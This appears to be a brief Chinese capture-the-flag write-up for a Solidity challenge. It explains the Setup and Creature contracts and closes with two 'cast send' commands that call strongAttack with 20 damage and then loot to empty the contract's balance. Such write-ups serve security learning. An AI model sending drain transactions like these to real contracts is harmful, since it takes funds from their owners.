分析一下附件
Setup.sol
Setup 合约旨在部署初始余额为 10 个以太币的 Creature 合约。部署时需要 1 个以太币存款。该合约包括一个 isSolve 函数,用于检查 Creature 合约的余额是否已耗尽为零。这种设置意味着目标是利用 Creature 合约来清空其余额,从而解决挑战
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Creature} from "./Creature.sol";
contract Setup {
Creature public immutable TARGET;
constructor() payable {
require(msg.value == 1 ether);
TARGET = new Creature{value: 10}();
}
function isSolved() public view returns (bool) {
return address(TARGET).balance == 0;
}
}
Creature.sol
Creature 合约代表一个简单的实体,具有生命值系统和转移其余额的机制。它开始时有 20 点生命值,可以通过 strongAttack 和 punch 功能进行攻击以减少其生命值。合约跟踪 aggro 变量中与其交互的最后一个地址。当生物的生命值降至零时,loot功能允许任何人提取合同的全部余额
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
contract Creature {
uint256 public lifePoints;
address public aggro;
constructor() payable {
lifePoints = 20;
}
function strongAttack(uint256 _damage) external{
_dealDamage(_damage);
}
function punch() external {
_dealDamage(1);
}
function loot() external {
require(lifePoints == 0, "Creature is still alive!");
payable(msg.sender).transfer(address(this).balance);
}
function _dealDamage(uint256 _damage) internal {
aggro = msg.sender;
lifePoints -= _damage;
}
}
cast send 0x0a9e61Ae68eb338f15e83daD97E136F7121fD473 "strongAttack(uint256)" 20 --rpc-url http://94.237.53.117:44065/rpc --interactive
cast send 0x0a9e61Ae68eb338f15e83daD97E136F7121fD473 "loot()" --rpc-url http://94.237.53.117:44065/rpc --interactive
访问 http://94.237.53.117:44065/flag
Comments | NOTHING